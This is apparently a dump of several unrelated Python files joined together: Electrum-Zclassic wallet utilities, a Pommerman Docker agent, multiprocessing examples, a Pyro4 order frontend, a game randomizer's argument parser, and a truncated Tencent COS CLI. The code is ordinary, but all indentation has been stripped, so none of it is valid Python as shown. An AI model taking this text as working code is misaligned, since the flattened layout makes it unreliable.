def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43200:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
# For raw json, append /insight-api-zcash
mainnet_block_explorers = {
'ZclassicExplorer.com': ('http://zclassicexplorer.com',
{'tx': 'tx', 'addr': 'address'}),
'ZCLMine.pro': ('http://explorer.zclmine.pro',
{'tx': 'tx', 'addr': 'address'}),
'MyZCL.com': ('http://myzcl.com',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'})
}
# TODO zcl testnet block explorer
testnet_block_explorers = {
#'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
#{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'})
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'ZclassicExplorer.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
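# Example (sketch): with the default 'ZclassicExplorer.com' entry above,
#   block_explorer_URL(config, 'tx', '<txid>') -> 'http://zclassicexplorer.com/tx/<txid>'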
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a Zclassic address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid Zclassic address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.daemon = True
t.start()
return out
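# Example (sketch), assuming COIN == 100000000 and a valid Zclassic address <addr>:
#   parse_URI('bitcoin:<addr>?amount=1.5&message=donation')
# returns {'address': '<addr>', 'amount': 150000000, 'message': 'donation', 'memo': 'donation'}.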
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def get_cert_path():
if is_bundle and is_macOS:
# set in ./electrum
return requests.utils.DEFAULT_CA_BUNDLE_PATH
return requests.certs.where()
|
docker_agent.py
|
import json
import time
import os
import threading
import requests
import docker
from . import BaseAgent
from .. import utility
from .. import characters
class DockerAgent(BaseAgent):
"""The Docker Agent that Connects to a Docker container where the character runs."""
def __init__(self,
docker_image,
port,
server='http://localhost',
character=characters.Bomber,
docker_client=None,
env_vars=None):
super(DockerAgent, self).__init__(character)
self._docker_image = docker_image
self._docker_client = docker_client or docker.from_env()
self._server = server
self._port = port
self._container = None
self._env_vars = env_vars or {}
container_thread = threading.Thread(
target=self._run_container, daemon=True)
container_thread.start()
self._wait_for_docker(self._server, self._port, 32)
def _run_container(self):
print("Starting container...")
# Any environment variables that start with DOCKER_AGENT are passed to the container
env_vars = self._env_vars
for key, value in os.environ.items():
if not key.startswith("DOCKER_AGENT_"):
continue
env_key = key.replace("DOCKER_AGENT_", "")
env_vars[env_key] = value
self._container = self._docker_client.containers.run(
self._docker_image,
detach=True,
auto_remove=True,
ports={10080: self._port},
environment=env_vars)
@staticmethod
def _wait_for_docker(server, port, timeout=None):
"""Wait for the container's network service to appear.
Args:
server: Server URL, e.g. 'http://localhost'.
port: Integer port.
timeout: Seconds to wait. None or 0 waits forever.
"""
backoff = .25
max_backoff = min(timeout, 16) if timeout else 16
if timeout:
# time module is needed to calc timeout shared between two exceptions
end = time.time() + timeout
while True:
try:
now = time.time()
if timeout and end < now:
return False
request_url = '%s:%s/ping' % (server, port)  # e.g. '<server>:<port>/ping'
req = requests.get(request_url)
return True
except requests.exceptions.ConnectionError as e:
print("ConnectionError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
except requests.exceptions.HTTPError as e:
print("HTTPError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
except docker.errors.APIError as e:
print("This is a Docker error. Please fix: ", e)
raise
def act(self, obs, action_space):
obs_serialized = json.dumps(obs, cls=utility.PommermanJSONEncoder)
request_url = "http://localhost:{}/action".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.25,
json={
"obs":
obs_serialized,
"action_space":
json.dumps(action_space, cls=utility.PommermanJSONEncoder)
})
action = req.json()['action']
except requests.exceptions.Timeout as e:
print('Timeout!')
# TODO: Fix this. It's ugly.
action = [0] * len(action_space.shape)
if len(action) == 1:
action = action[0]
return action
def shutdown(self):
print("Stopping container..")
if self._container:
try:
return self._container.remove(force=True)
except docker.errors.NotFound as e:
return True
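# A minimal usage sketch (hypothetical image name; assumes a container that serves the
# /ping and /action HTTP endpoints expected above):
#
#   agent = DockerAgent('example/test-agent', port=10080)
#   action = agent.act(obs, action_space)
#   agent.shutdown()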
|
with_multiprocess.py
|
from time import time
from multiprocessing import Process
def factorize(number):
for i in range(1, number + 1):
if number % i == 0:
yield i
def run_factorize(number):
# factorize() is a generator; consume it so the factorization work actually runs in the child process
list(factorize(number))
def main():
numbers = [8402868, 2295738, 5938342, 7925426]
start = time()
processes = []
for number in numbers:
process = Process(target=run_factorize, args=(number,))
process.start()
processes.append(process)
# wait for all processes to finish
for p in processes:
p.join()
end = time()
print(f'Took {end - start:.3f} seconds')
if __name__ == '__main__':
main()
|
mprocess.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Topic: multiprocessing example programs
Desc :
"""
from multiprocessing import Process
import os
# code to be run by the child process
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Process(target=run_proc, args=('test',))
print('Child process will start.')
p.start()
p.join()
print('Child process end.')
from multiprocessing import Pool
import os, time, random
def long_time_task(name):
print('Run task %s (%s)...' % (name, os.getpid()))
start = time.time()
time.sleep(random.random() * 3)
end = time.time()
print('Task %s runs %0.2f seconds.' % (name, (end - start)))
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Pool(4)
for i in range(5):
p.apply_async(long_time_task, args=(i,))
print('Waiting for all subprocesses done...')
p.close()
p.join()
print('All subprocesses done.')
from multiprocessing import Process, Queue
import os, time, random
# code executed by the writer process:
def write(q):
print('Process to write: %s' % os.getpid())
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# code executed by the reader process:
def read(q):
print('Process to read: %s' % os.getpid())
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__=='__main__':
# the parent process creates the Queue and passes it to each child process:
q = Queue()
pw = Process(target=write, args=(q,))
pr = Process(target=read, args=(q,))
# start the writer child process pw:
pw.start()
# start the reader child process pr:
pr.start()
# wait for pw to finish:
pw.join()
# pr runs an infinite loop and never exits on its own, so it has to be terminated forcibly:
pr.terminate()
|
frontend.py
|
#!/usr/bin/python3
""" User Client """
import json
import socketserver
import sys
import threading
import Pyro4
# TODO: work out what is throwing errors
# TODO: get server polling code to change server status if there is an outage.
import order_server
from Pyro4.errors import CommunicationError, PyroError
class FrontEnd(object):
def __init__(self):
ns = Pyro4.locateNS()
self.server_uris = [ns.lookup("OrderManager1"), ns.lookup("OrderManager2"), ns.lookup("OrderManager3")]
serverlist = []
for uri in self.server_uris:
serverlist.append(Pyro4.Proxy(uri))
# update server lists
for s in serverlist:
try:
s.set_servers(self.server_uris)
except PyroError:
pass # ignore the error
print(self.server_uris)
def __get_order_server(self):
primary_server = True
for server in self.server_uris:
try:
actual_server = Pyro4.Proxy(server)
actual_server.set_primary_state(primary_server)
primary_server = False
return actual_server
except ConnectionRefusedError:
pass
except CommunicationError:
pass
except PyroError:
pass
return None # todo throw No Remaining Servers exception
def process_command(self, data):
print("Frontend data: ", data)
command = data['action']
userid = data['userid']
input = data['data']
if not userid:
return "No USERID specified"
if command == "ADD":
print("Running Action Frontend")
items_to_order = input.split(',')
if len(items_to_order) > 3 or len(items_to_order) == 0:
return "Must enter at least 1 item, and no more than 3."
# deal with batch stuff, to
results = self.__get_order_server().place_order(userid, items_to_order)
# todo check length to make sure a server is online.
return str(results)
elif command == "DELETE":
print("running delete front end")
del_index = input
results = self.__get_order_server().cancel_order(userid, del_index)
# todo check results to ensure things are fine :D
return str(results)
elif command == "HISTORY":
print("Running History frontend")
results = self.__get_order_server().get_order_history(userid)
print("Frontend results: ", results)
# todo remove batch processing for this (no CUD needed, only R).
return str(results)
else:
return "Command not found. Please try again"
class MyServer(socketserver.BaseRequestHandler):
def handle(self):
server = FrontEnd()
data = self.request.recv(1024).strip()
data = data.decode()
data_dict = json.loads(data)
res = server.process_command(data_dict)
# server log now
print("Frontend: ", res)
response = res.encode()
print("Frontend encoded: ", response)
self.request.sendall(response)
def main(host, port):
# for i in range(1, 4):
# t = threading.Thread(target=order_server.main, args=[i])
# t.daemon = True
# t.start()
server = socketserver.TCPServer((host, port), MyServer)
server.serve_forever()
if __name__ == "__main__":
print("Arguments frontend: ", sys.argv)
hostname = sys.argv[1]
portnum = int(sys.argv[2])
main(hostname, portnum)
|
main.py
|
import binascii
from romTables import ROMWithTables
import shlex
import randomizer
import logic
import patches.dungeonEntrances
import explorer
import spoilerLog
def main(mainargs=None):
import argparse
import sys
parser = argparse.ArgumentParser(description='Randomize!')
parser.add_argument('input_filename', metavar='input rom', type=str,
help="Rom file to use as input.")
parser.add_argument('-o', '--output', dest="output_filename", metavar='output rom', type=str, required=False,
help="Output filename to use. If not specified [seed].gbc is used.")
parser.add_argument('--dump', dest="dump", action="store_true",
help="Dump the logic of the given rom (spoilers!)")
parser.add_argument('--spoilerformat', dest="spoilerformat", choices=["none", "console", "text", "json"], default="none",
help="Sets the output format for the generated seed's spoiler log")
parser.add_argument('--spoilerfilename', dest="spoiler_filename", type=str, required=False,
help="Output filename to use for the spoiler log. If not specified, LADXR_[seed].txt/json is used.")
parser.add_argument('--test', dest="test", action="store_true",
help="Test the logic of the given rom, without showing anything.")
parser.add_argument('-s', '--seed', dest="seed", type=str, required=False,
help="Generate the specified seed")
parser.add_argument('--romdebugmode', dest="romdebugmode", action="store_true",
help="Patch the rom so that debug mode is enabled, this creates a default save with most items and unlocks some debug features.")
parser.add_argument('--exportmap', dest="exportmap", action="store_true",
help="Export the map (many graphical mistakes)")
parser.add_argument('--emptyplan', dest="emptyplan", type=str, required=False,
help="Write an unfilled plan file")
parser.add_argument('--timeout', type=float, required=False,
help="Timeout generating the seed after the specified number of seconds")
# Flags that affect gameplay
parser.add_argument('--plan', dest="plan", metavar='plandomizer', type=str, required=False,
help="Read an item placement plan")
parser.add_argument('--race', dest="race", nargs="?", default=False, const=True,
help="Enable race mode. This generates a rom from which the spoiler log cannot be dumped and the seed cannot be extracted.")
parser.add_argument('--logic', dest="logic", choices=["normal", "hard", "glitched", "hell"],
help="Which level of logic is required.")
parser.add_argument('--multiworld', dest="multiworld", type=int, required=False,
help="Generates multiple roms for a multiworld setup.")
parser.add_argument('--multiworld-config', dest="multiworld_config", action="append", required=False,
help="Set configuration for a multiworld player, supply multiple times for settings per player")
parser.add_argument('--forwardfactor', dest="forwardfactor", type=float, required=False,
help="Forward item weight adjustment factor, lower values generate more rear heavy seeds while higher values generate front heavy seeds. Default is 0.5.")
parser.add_argument('--heartpiece', dest="heartpiece", action="store_true",
help="Enables randomization of heart pieces.")
parser.add_argument('--seashells', dest="seashells", action="store_true",
help="Enables seashells mode, which randomizes the secret sea shells hidden in the ground/trees. (chests are always randomized)")
parser.add_argument('--heartcontainers', dest="heartcontainers", action="store_true",
help="Enables heartcontainer mode, which randomizes the heart containers dropped by bosses.")
parser.add_argument('--instruments', dest="instruments", action="store_true",
help="Shuffle the instruments in the item pool.")
parser.add_argument('--owlstatues', dest="owlstatues", choices=['none', 'dungeon', 'overworld', 'both'], default='none',
help="Give the owl statues in dungeons or on the overworld items as well, instead of showing the normal hints")
parser.add_argument('--keysanity', dest="keysanity", action="store_true",
help="Enables keysanity mode, which shuffles all dungeon items outside dungeons as well.")
parser.add_argument('--randomstartlocation', dest="randomstartlocation", action="store_true",
help="Place your starting house at a random location.")
parser.add_argument('--dungeonshuffle', dest="dungeonshuffle", action="store_true",
help="Enable dungeon shuffle, puts dungeons on different spots.")
parser.add_argument('--boss', dest="boss", choices=["default", "shuffle", "random"], default="default",
help="Enable boss shuffle, swaps around dungeon bosses.")
parser.add_argument('--miniboss', dest="miniboss", choices=["default", "shuffle", "random"], default="default",
help="Shuffle the minibosses or just randomize them.")
parser.add_argument('--witch', dest="witch", action="store_true",
help="Enables witch and toadstool in the item pool.")
parser.add_argument('--hpmode', dest="hpmode", choices=['default', 'inverted', '1'], default='default',
help="Set the HP gameplay mode. Inverted causes health containers to take HP instead of giving it and you start with more health. 1 sets your starting health to just 1 heart.")
parser.add_argument('--boomerang', dest="boomerang", choices=['default', 'trade', 'gift'], default='default',
help="Put the boomerang and the trade with the boomerang in the item pool")
parser.add_argument('--steal', dest="steal", choices=['never', 'always', 'default'], default='always',
help="Configure when to allow stealing from the shop.")
parser.add_argument('--hard-mode', dest="hardMode", action="store_true",
help="Make the game a bit harder, less health from drops, bombs damage yourself, and less iframes.")
parser.add_argument('--goal', dest="goal", choices=['-1', '0', '1', '2', '3', '4', '5', '6', '7', '8', 'random', 'raft', 'seashells'], default='8',
help="Configure the instrument goal for this rom, anything between 0 and 8.")
parser.add_argument('--accessibility', dest="accessibility_rule", choices=['all', 'goal'],
help="Switches between making sure all locations are reachable or only the goal is reachable")
parser.add_argument('--bowwow', dest="bowwow", choices=['normal', 'always', 'swordless'], default='normal',
help="Enables 'good boy mode', where BowWow is allowed on all screens and can damage bosses and more enemies.")
parser.add_argument('--pool', dest="itempool", choices=['normal', 'casual', 'pain', 'keyup'], default='normal',
help="Sets up different item pools, for easier or harder gameplay.")
parser.add_argument('--overworld', dest="overworld", choices=['normal', 'dungeondive'], default='normal')
# Purely aesthetic flags
parser.add_argument('--gfxmod', dest="gfxmod", action='append',
help="Load graphical mods.")
parser.add_argument('--quickswap', dest="quickswap", choices=['none', 'a', 'b'], default='none',
help="Configure quickswap for A or B button (select key swaps, no longer opens map)")
parser.add_argument('--textmode', dest="textmode", choices=['default', 'fast', 'none'], default='default',
help="Default just keeps text normal, fast makes text appear twice as fast, and none removes all text from the game.")
parser.add_argument('--nag-messages', dest="removeNagMessages", action="store_false",
help="Enable the nag messages on touching stones and crystals. By default they are removed.")
parser.add_argument('--lowhpbeep', dest="lowhpbeep", choices=['default', 'slow', 'none'], default='slow',
help="Slows or disables the low health beeping sound")
parser.add_argument('--linkspalette', dest="linkspalette", type=int, default=None,
help="Force the palette of link")
args = parser.parse_args(mainargs)
if args.multiworld is not None:
args.multiworld_options = [args] * args.multiworld
if args.multiworld_config is not None:
for index, settings_string in enumerate(args.multiworld_config):
args.multiworld_options[index] = parser.parse_args([args.input_filename] + shlex.split(settings_string))
if args.timeout is not None:
import threading
import time
import os
def timeoutFunction():
time.sleep(args.timeout)
print("TIMEOUT")
sys.stdout.flush()
os._exit(1)
threading.Thread(target=timeoutFunction, daemon=True).start()
if args.exportmap:
import mapexport
print("Loading: %s" % (args.input_filename))
rom = ROMWithTables(args.input_filename)
mapexport.MapExport(rom)
sys.exit(0)
if args.emptyplan:
import locations.items
import logic
f = open(args.emptyplan, "wt")
f.write(";Plandomizer data\n;Items: %s\n" % (", ".join(map(lambda n: getattr(locations.items, n), filter(lambda n: not n.startswith("__"), dir(locations.items))))))
f.write(";Modify the item pool:\n")
f.write(";Pool:SWORD:+5\n")
f.write(";Pool:RUPEES_50:-5\n")
iteminfo_list = logic.Logic(args, start_house_index=0, entranceMapping=list(range(9)), bossMapping=list(range(9))).iteminfo_list
for ii in sorted(iteminfo_list, key=lambda n: (n.location.dungeon if n.location.dungeon else -1, repr(n.metadata))):
if len(ii.OPTIONS) > 1:
f.write(";%r\n" % (ii.metadata))
f.write("Location:%s: \n" % (ii.nameId))
sys.exit(0)
if args.dump or args.test:
print("Loading: %s" % (args.input_filename))
rom = ROMWithTables(args.input_filename)
if args.spoilerformat == "none":
args.spoilerformat = "console"
try:
log = spoilerLog.SpoilerLog(args, rom)
log.output(args.spoiler_filename)
sys.exit(0)
except spoilerLog.RaceRomException:
print("Cannot read spoiler log for race rom")
sys.exit(1)
if args.seed:
try:
args.seed = binascii.unhexlify(args.seed)
except binascii.Error:
args.seed = args.seed.encode("ascii")
retry_count = 0
while True:
try:
r = randomizer.Randomizer(args, seed=args.seed)
seed = binascii.hexlify(r.seed).decode("ascii").upper()
break
except randomizer.Error:
if args.seed is not None:
print("Specified seed does not produce a valid result.")
sys.exit(1)
retry_count += 1
if retry_count > 100:
print("Randomization keeps failing, abort!")
sys.exit(1)
print("Failed, trying again: %d" % (retry_count))
print("Seed: %s" % (seed))
if __name__ == "__main__":
main()
|
cos_cmd.py
|
# -*- coding: utf-8 -*-
from six.moves.configparser import SafeConfigParser
from six import text_type
from argparse import ArgumentParser
from logging.handlers import RotatingFileHandler
import sys
import logging
import os
import json
import requests
import qcloud_cos
from threading import Thread
from coscmd import cos_global
if sys.version > '3':
from coscmd.cos_client import CoscmdConfig, CosS3Client
from coscmd.cos_global import Version
else:
from cos_client import CoscmdConfig, CosS3Client
from cos_global import Version
logger = logging.getLogger("coscmd")
fs_coding = sys.getfilesystemencoding()
pre_appid = ""
pre_bucket = ""
pre_region = ""
config_path = ""
silence = False
global res
def concat_path(source_path, target_path):
source_path = source_path.replace('\\', '/')
target_path = target_path.replace('\\', '/')
if source_path.endswith('/') is False:
if target_path.endswith('/') is True:
target_path += source_path.split('/')[-1]
return source_path, target_path
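# Examples (sketch):
#   concat_path('local/photos/cat.jpg', 'backup/') -> ('local/photos/cat.jpg', 'backup/cat.jpg')
#   concat_path('local/photos/cat.jpg', 'backup')  -> ('local/photos/cat.jpg', 'backup')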
def to_printable_str(s):
if isinstance(s, text_type):
return s.encode(fs_coding)
else:
return s
def config(args):
logger.debug("config: " + str(args))
conf_path = os.path.expanduser(config_path)
with open(conf_path, 'w+') as f:
cp = SafeConfigParser()
cp.add_section("common")
cp.set('common', 'secret_id', args.secret_id)
cp.set('common', 'secret_key', args.secret_key)
if args.token != "":
cp.set('common', 'token', args.token)
cp.set('common', 'bucket', args.bucket)
if args.endpoint:
cp.set('common', 'endpoint', args.endpoint)
else:
cp.set('common', 'region', args.region)
cp.set('common', 'max_thread', str(args.max_thread))
cp.set('common', 'part_size', str(args.part_size))
cp.set('common', 'retry', str(args.retry))
cp.set('common', 'timeout', str(args.timeout))
if args.appid != "":
cp.set('common', 'appid', args.appid)
if args.use_http:
cp.set('common', 'schema', 'http')
else:
cp.set('common', 'schema', 'https')
cp.set('common', 'verify', args.verify)
if args.anonymous:
cp.set('common', 'anonymous', 'True')
else:
cp.set('common', 'anonymous', 'False')
cp.write(f)
logger.info("Created configuration file in {path}".format(path=to_printable_str(conf_path)))
def compatible(region):
if region is None:
return None
_dict = {'tj': 'ap-beijing-1', 'bj': 'ap-beijing', 'gz': 'ap-guangzhou', 'sh': 'ap-shanghai',
'cd': 'ap-chengdu', 'spg': 'ap-singapore', 'hk': 'ap-hongkong', 'ca': 'na-toronto', 'ger': 'eu-frankfurt',
'cn-south': 'ap-guangzhou', 'cn-north': 'ap-beijing-1'}
if region.startswith('cos.'):
region = region[4:]
if region in _dict:
region = _dict[region]
return region
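# Examples (sketch): legacy short region names are mapped to current identifiers,
# anything else is passed through unchanged:
#   compatible('cos.gz') -> 'ap-guangzhou'
#   compatible('tj')     -> 'ap-beijing-1'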
def load_conf():
conf_path = os.path.expanduser(config_path)
if not os.path.exists(conf_path):
logger.warn("{conf} couldn't be found, please use \'coscmd config -h\' to learn how to config coscmd!".format(conf=to_printable_str(conf_path)))
raise IOError
else:
logger.debug('{conf} is found'.format(conf=to_printable_str(conf_path)))
try:
with open(conf_path, 'r') as f:
cp = SafeConfigParser()
cp.readfp(fp=f)
if not cp.has_section('common'):
raise Exception("[common] section could't be found, please check your config file.")
if cp.has_option('common', 'part_size'):
part_size = cp.getint('common', 'part_size')
else:
part_size = 1
if cp.has_option('common', 'max_thread'):
max_thread = cp.getint('common', 'max_thread')
else:
max_thread = 5
try:
secret_id = cp.get('common', 'secret_id')
except Exception:
secret_id = cp.get('common', 'access_id')
try:
appid = cp.get('common', 'appid')
bucket = cp.get('common', 'bucket')
if bucket.endswith("-"+str(appid)):
bucket = bucket.rstrip(appid)
bucket = bucket[:-1]
except Exception:
try:
bucket = cp.get('common', 'bucket')
appid = bucket.split('-')[-1]
bucket = bucket.rstrip(appid)
bucket = bucket[:-1]
except Exception:
# check if user use -b bucket
if (pre_bucket == ""):
logger.error("The configuration file is wrong. Please reconfirm")
try:
schema = cp.get('common', 'schema')
except Exception:
schema = 'https'
try:
verify = cp.get('common', 'verify')
except Exception:
verify = 'md5'
try:
token = cp.get('common', 'token')
except Exception:
token = None
try:
anonymous = cp.get('common', 'anonymous')
if anonymous == 'True' or anonymous == 'true':
anonymous = True
else:
anonymous = False
except Exception:
anonymous = False
try:
retry = int(cp.get('common', 'retry'))
except Exception:
retry = 2
try:
timeout = int(cp.get('common', 'timeout'))
except Exception:
timeout = 60
region, endpoint = None, None
if cp.has_option('common', 'region'):
region = cp.get('common', 'region')
if cp.has_option('common', 'endpoint'):
endpoint = cp.get('common', 'endpoint')
if pre_appid != "":
appid = pre_appid
if pre_bucket != "":
bucket = pre_bucket
if pre_region != "":
region = pre_region
conf = CoscmdConfig(
appid=appid,
secret_id=secret_id,
secret_key=cp.get('common', 'secret_key'),
token=token,
region=compatible(region),
endpoint=endpoint,
bucket=bucket,
part_size=part_size,
max_thread=max_thread,
schema=schema,
anonymous=anonymous,
verify=verify,
retry=retry,
timeout=timeout,
silence=silence
)
return conf
except Exception as e:
raise(e)
class Op(object):
@staticmethod
def upload(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if args.cos_path == "":
args.cos_path = "/"
Interface = client.op_int()
if not isinstance(args.local_path, text_type):
args.local_path = args.local_path.decode(fs_coding)
if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
if not os.path.exists(args.local_path):
logger.warn("cannot stat '%s': No such file or directory" % to_printable_str(args.local_path))
return -1
if not os.access(args.local_path, os.R_OK):
logger.warn('local_path %s is not readable!' % to_printable_str(args.local_path))
return -1
args.local_path, args.cos_path = concat_path(args.local_path, args.cos_path)
if args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
kwargs = {}
kwargs['sync'] = args.sync
kwargs['skipmd5'] = args.skipmd5
kwargs['ignore'] = args.ignore.split(',')
kwargs['include'] = args.include.split(',')
kwargs['force'] = args.force
kwargs['delete'] = args.delete
kwargs['yes'] = args.yes
if args.recursive:
if os.path.isfile(args.local_path) is True:
rt = Interface.upload_file(args.local_path, args.cos_path, args.headers, **kwargs)
return rt
elif os.path.isdir(args.local_path):
rt = Interface.upload_folder(args.local_path, args.cos_path, args.headers, **kwargs)
return rt
else:
if os.path.isdir(args.local_path):
logger.warn("\"{path}\" is a directory, use \'-r\' option to upload it please".format(path=to_printable_str(args.local_path)))
return -1
if os.path.isfile(args.local_path) is False:
logger.warn("cannot stat '%s': No such file or directory" % to_printable_str(args.local_path))
return -1
rt = Interface.upload_file(args.local_path, args.cos_path, args.headers, **kwargs)
return rt
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def download(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
if not isinstance(args.local_path, text_type):
args.local_path = args.local_path.decode(fs_coding)
if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
args.cos_path, args.local_path = concat_path(args.cos_path, args.local_path)
if args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
kwargs = {}
kwargs['force'] = args.force
kwargs['sync'] = args.sync
kwargs['num'] = min(20, args.num)
kwargs['ignore'] = args.ignore.split(',')
kwargs['include'] = args.include.split(',')
kwargs['skipmd5'] = args.skipmd5
kwargs['delete'] = args.delete
kwargs['yes'] = args.yes
if args.recursive:
rt = Interface.download_folder(args.cos_path, args.local_path, args.headers, **kwargs)
return rt
else:
rt = Interface.download_file(args.cos_path, args.local_path, args.headers, **kwargs)
return rt
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def delete(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
Interface = client.op_int()
if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
kwargs = {}
